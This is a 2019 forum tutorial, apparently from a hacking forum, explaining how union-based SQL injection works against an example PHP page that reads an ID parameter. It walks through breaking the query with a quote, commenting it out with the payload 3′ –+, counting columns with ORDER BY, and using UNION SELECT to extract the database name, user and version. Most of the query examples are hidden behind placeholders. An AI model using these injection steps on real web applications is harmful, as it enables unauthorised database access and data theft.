]
04-18-2019, 03:35 PM
![[Image: sqli1-big.png]](https://hacksland.net/wp-content/uploads/sqli1-big.png)
Hello all,
I hope you know how to do a SQL injection and have used it .In this tutorial we are going to see how it is working. What’s going on under the hood. How web application handle our input and process the SQL quarry. Let’s see.
Imagine that there is a web application like this.
Front-End Web Application
Hear we see how web application takes input from the user and send that data to PHP script through a GET request.
![[Image: 12.png]](https://hacksland.net/wp-content/uploads/12.png)
Back-end PHP Script
Now there should be a back-end script that handle this submitted data and make a SQL quarry.
After SQL quarry return some data from database PHP script processes that data and give user output.
Assume that following is the PHP code .
![[Image: 13.png]](https://hacksland.net/wp-content/uploads/13.png)
I hope you can understand what is going hear.
For this example we need a table that used by SQL quarry to take data from.
![[Image: 14.png]](https://hacksland.net/wp-content/uploads/14.png)
So all OK and fine.
SQL Quarry
Now let’s see how this is happening.
Imagine that I enter 3 as the input. So our ID will be equal to 3. What about our SQL quarry?
Hidden Content
So it will give us the output.
Name for ID: Clara
Age for ID : 18
Nice!. It’s look like web application is working fine.
Do you remember in our previous tutorial we used a single quote to break a SQL quarry?
what if I enter 3′ as the input?
It give me an error.
Hidden Content
What the fuck goes hear?
Hidden Content
You can clearly see that there is a syntax error near ID=’3”. Previously I explained why this happening.
Injecting SQL Quarry
Now we have to see how we can fix this error and extract data from the database. What if I enter flowing payload?.
3′ –+
Now our quarry is.
Hidden Content
But actually we only care the code before –+ Because it’s a comment character in SQL and everything after that will be ignored. So now this cod is valid and it’ll give us the output as expected.
This is the time to fetch data from database.But how?
Can we use another SELECT command with this one?
Yes indeed. we can use two SELECT commands with UNION operator like this.
Hidden Content
But one thing. Both of SELECT quarries must use slimier number of columns to fetch data. It’s no matter that they use different columns , only amount of used columns should be same.
You may say that it’s simple there are 5 columns in table. No buddy in real life you can’t see the table and you can’t figure out how many columns are there. :sad:
We can you a trick for finding the number of columns used by first SELECT command.
Think about our table and following commands.
Hidden Content
first command says select all columns from the users table and the order of results should be accordion to Name column. Second command also says that but results should be order with 3rd column(Age).
So even we don’t know column names we can order by 1,2,3 etc OK.
Now I enter this as the ID .
Hidden Content
Let’s see our quarry.
Hidden Content
This gives us output as expected because there are more columns than 1 . So it’s possible to order result accordion to the first column.
Next we try order by 2. This also will be fine. Web application will work normally until we say order by 5.
What if we enter order by 6 ?
Surely it’ll give an error because there are no 6 columns. So by using this method we can find how many columns are using the first SELECT command. Now we can use another SELECT command
Hidden Content
What going on hear is SQL quarry think that there is another table like following and quarry try to fetch data from both of them. After those data will be print to screen by PHP code.
Now if we can print data from second table we can find which columns are using by web application to show data.(In this example we know that PHP script get Name and Age columns). But unfortunately we still we can see only flowing output. :sad:
Name for ID: Clara
Age for ID : 18
why that? Because while our SQL quarry see there are two tables it first try to fetch data from first table. So if we want to get data from second one we must set a null value to first SELECT command . Our final payload .
Hidden Content
Since -3 is not in ID column data from our second table will be printed out.
Name for ID: 2
Age for ID : 3
Finlay it’s success. We can see column 2 and 3 is used by web app.
Now we can use these 2 channels for get any data from database. :smile:
Extracting Basic information
First of all let’s give a try to find out database name.
Hidden Content
we can see the database name in the screen.
Name for ID: database_name
Age for ID : 3
Hidden Content
Like this you can use
database() , user() , version() etc to fetch some basic data.
In next tutorials I'll explain more deep concepts in SQLi like blind sql injections etc.
